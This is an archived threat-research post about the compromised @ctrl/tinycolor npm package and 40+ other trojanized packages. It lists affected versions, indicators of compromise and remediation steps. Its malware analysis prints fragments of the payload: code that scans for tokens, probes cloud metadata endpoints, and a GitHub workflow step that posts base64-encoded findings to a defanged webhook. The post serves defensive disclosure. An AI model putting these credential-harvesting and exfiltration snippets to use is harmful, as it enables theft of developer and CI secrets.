{
	"id": "e73a9f82-ba3a-4cb4-9129-84e931052458",
	"created_at": "2026-04-29T02:22:10.614557Z",
	"updated_at": "2026-04-29T08:21:32.141727Z",
	"deleted_at": null,
	"sha1_hash": "21e5e041c89364f0940c5c592a4c9bca9eee1e53",
	"title": "Popular Tinycolor npm Package Compromised in Supply Chain Attack Affecting 40+ Packages",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 609094,
	"plain_text": "Popular Tinycolor npm Package Compromised in Supply Chain\r\nAttack Affecting 40+ Packages\r\nBy Socket Research Team\r\nPublished: 2025-09-15 · Archived: 2026-04-29 02:08:03 UTC\r\nSecure your dependencies with us\r\nSocket proactively blocks malicious open source packages in your code.\r\nInstall\r\nUpdate (September 16, 2025): This campaign has expanded significantly. Our follow up documents\r\nnearly 500 affected npm packages, including several open source CrowdStrike packages. Read the\r\nhttps://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages\r\nPage 1 of 7\n\nlatest analysis and guidance: https://socket.dev/blog/ongoing-supply-chain-attack-targets-crowdstrike-npm-packages\r\nA malicious update to @ctrl/tinycolor (2.2M weekly downloads) was detected on npm as part of a broader\r\nsupply chain attack that impacted more than 40 packages spanning multiple maintainers.\r\nThe compromised versions include a function ( NpmModule.updatePackage ) that downloads a package tarball,\r\nmodifies package.json , injects a local script ( bundle.js ), repacks the archive, and republishes it, enabling\r\nautomatic trojanization of downstream packages.\r\nThe issue was first noticed by Daniel dos Santos Pereira, who flagged suspicious behavior in the latest release.\r\nSocket’s automated malware detection also surfaced the threat in 40+ additional packages, and our research team\r\ncontinues to analyze the payload and its distribution method. While tinycolor is the most visible package, with 2.2\r\nmillion weekly downloads on npm, it did not originate these compromises, but is one package among dozens\r\ntrojanized in this active campaign.\r\nhttps://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages\r\nPage 2 of 7\n\nCompromised Packages and Versions\r\nThe following npm packages and versions have been confirmed as affected:\r\nangulartics2@14.1.2\r\n@ctrl/deluge@7.2.2\r\n@ctrl/golang-template@1.4.3\r\n@ctrl/magnet-link@4.0.4\r\n@ctrl/ngx-codemirror@7.0.2\r\n@ctrl/ngx-csv@6.0.2\r\nhttps://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages\r\nPage 3 of 7\n\n@ctrl/ngx-emoji-mart@9.2.2\r\n@ctrl/ngx-rightclick@4.0.2\r\n@ctrl/qbittorrent@9.7.2\r\n@ctrl/react-adsense@2.0.2\r\n@ctrl/shared-torrent@6.3.2\r\n@ctrl/tinycolor@4.1.1 , @4.1.2\r\n@ctrl/torrent-file@4.1.2\r\n@ctrl/transmission@7.3.1\r\n@ctrl/ts-base32@4.0.2\r\nencounter-playground@0.0.5\r\njson-rules-engine-simplified@0.2.4 , 0.2.1\r\nkoa2-swagger-ui@5.11.2 , 5.11.1\r\n@nativescript-community/gesturehandler@2.0.35\r\n@nativescript-community/sentry 4.6.43\r\n@nativescript-community/text@1.6.13\r\n@nativescript-community/ui-collectionview@6.0.6\r\n@nativescript-community/ui-drawer@0.1.30\r\n@nativescript-community/ui-image@4.5.6\r\n@nativescript-community/ui-material-bottomsheet@7.2.72\r\n@nativescript-community/ui-material-core@7.2.76\r\n@nativescript-community/ui-material-core-tabs@7.2.76\r\nngx-color@10.0.2\r\nngx-toastr@19.0.2\r\nngx-trend@8.0.1\r\nreact-complaint-image@0.0.35\r\nreact-jsonschema-form-conditionals@0.3.21\r\nreact-jsonschema-form-extras@1.0.4\r\nrxnt-authentication@0.0.6\r\nrxnt-healthchecks-nestjs@1.0.5\r\nrxnt-kue@1.0.7\r\nswc-plugin-component-annotate@1.9.2\r\nts-gaussian@3.0.6\r\nMalware Analysis#\r\nThe bundle.js script downloads and executes TruffleHog, a legitimate secret scanner, then searches the host for\r\ntokens and cloud credentials. It validates and uses developer and CI credentials, creates a GitHub Actions\r\nworkflow inside repositories, and exfiltrates results to a hardcoded webhook\r\n( hxxps://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7 ).\r\nThe script runs automatically when the package is installed.\r\nhttps://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages\r\nPage 4 of 7\n\nThe referenced bundle.js is a large, minified file that functions as a controller. It profiles the platform, fetches a\r\nmatching TruffleHog binary, and searches for known credential patterns across the filesystem and repositories.\r\n// De-minified transcription from bundle.js\r\nconst { execSync } = require(\"child_process\");\r\nconst os = require(\"os\");\r\nfunction trufflehogUrl() {\r\n const plat = os.platform();\r\n if (plat === \"win32\") return \"hxxps://github[.]com/trufflesecurity/trufflehog/releases/download/.../trufflehog\r\n if (plat === \"linux\") return \"hxxps://github[.]com/trufflesecurity/trufflehog/releases/download/.../trufflehog\r\n return \"hxxps://github[.]com/trufflesecurity/trufflehog/releases/download/.../trufflehog_darwin_all.tar.gz\";\r\n}\r\nfunction runScanner(binaryPath, targetDir) {\r\n // Executes downloaded scanner against local paths\r\n const cmd = `\"${binaryPath}\" filesystem \"${targetDir}\" --json`;\r\n const out = execSync(cmd, { stdio: \"pipe\" }).toString();\r\n return JSON.parse(out); // Parsed findings contain tokens and secrets\r\n}\r\nThe controller also includes a bash block that uses a GitHub personal access token if present, writes a GitHub\r\nActions workflow into .github/workflows , and exfiltrates collected content to a webhook.\r\n# Extracted from a literal script block inside bundle.js\r\nFILE_NAME=\".github/workflows/shai-hulud-workflow.yml\"\r\n# Minimal exfil step inside the generated workflow\r\n# Note: defanged URL for safety\r\nrun: |\r\n CONTENTS=\"$(cat findings.json | base64 -w0)\"\r\n curl -s -X POST -d \"$CONTENTS\" \"hxxps://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7\"\r\nStealing Secrets\r\nThe script combines local scanning with service specific probing. It looks for environment variables such as\r\nGITHUB_TOKEN , NPM_TOKEN , AWS_ACCESS_KEY_ID , and AWS_SECRET_ACCESS_KEY . It validates npm tokens with\r\nthe whoami endpoint, and it interacts with GitHub APIs when a token is available. It also attempts cloud\r\nmetadata discovery that can leak short lived credentials inside cloud build agents.\r\nhttps://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages\r\nPage 5 of 7\n\n// Key network targets inside the bundle\r\nconst imdsV4 = \"http://169[.]254[.]169[.]254\"; // AWS instance metadata\r\nconst imdsV6 = \"http://[fd00:ec2::254]\"; // AWS metadata over IPv6\r\nconst gcpMeta = \"http://metadata[.]google[.]internal\"; // GCP metadata\r\n// npm token verification\r\nfetch(\"https://registry.npmjs.org/-/whoami\", {\r\n headers: { \"Authorization\": `Bearer ${process.env.NPM_TOKEN}` }\r\n});\r\n// GitHub API use if GITHUB_TOKEN is present\r\nfetch(\"https://api.github.com/user\", {\r\n headers: { \"Authorization\": `token ${process.env.GITHUB_TOKEN}` }\r\n});\r\nThe workflow that it writes to repositories persists beyond the initial host. Once committed, any future CI run can\r\ntrigger the exfiltration step from within the pipeline where sensitive secrets and artifacts are available by design.\r\nAdditional Exfiltration\r\nThe payload aggregates findings into a local file named data.json before any outbound transfer. In addition to\r\nplanting a workflow that posts ${{ toJSON(secrets) }} to webhook[.]site , the script can publish stolen data\r\ninto public GitHub repositories created under the victim account, which mirrors patterns seen in the Nx incident.\r\nThis route persists even if webhook egress is blocked, and it expands impact to any repositories reachable by the\r\ncaptured token.\r\nIndicators of Compromise\r\nbundle.js SHA-256: 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09\r\nExfiltration endpoint: hxxps://webhook[.]site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7\r\nImmediate Guidance\r\nUninstall or pin to known-good versions until patched releases are verified.\r\nAudit environments (CI/CD agents, developer laptops) that installed the affected versions for\r\nunauthorized publishes or credential theft.\r\nRotate npm tokens and other exposed secrets if these packages were present on machines with\r\npublishing credentials.\r\nMonitor logs for unusual npm publish or package modification events.\r\nA full technical analysis of the malware, its propagation method, and remediation guidance will follow as our\r\ninvestigation progresses.\r\nSocket Threat Research Team\r\nThis research was led by:\r\nhttps://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages\r\nPage 6 of 7\n\nPhilipp Burckhardt\r\nKirill Boychenko\r\nSarah Gooding\r\nSource: https://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages\r\nhttps://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages"
	],
	"report_names": [
		"tinycolor-supply-chain-attack-affects-40-packages"
	],
	"threat_actors": [],
	"ts_created_at": 1777429330,
	"ts_updated_at": 1777450892,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/21e5e041c89364f0940c5c592a4c9bca9eee1e53.pdf",
		"text": "https://archive.orkl.eu/21e5e041c89364f0940c5c592a4c9bca9eee1e53.txt",
		"img": "https://archive.orkl.eu/21e5e041c89364f0940c5c592a4c9bca9eee1e53.jpg"
	}
}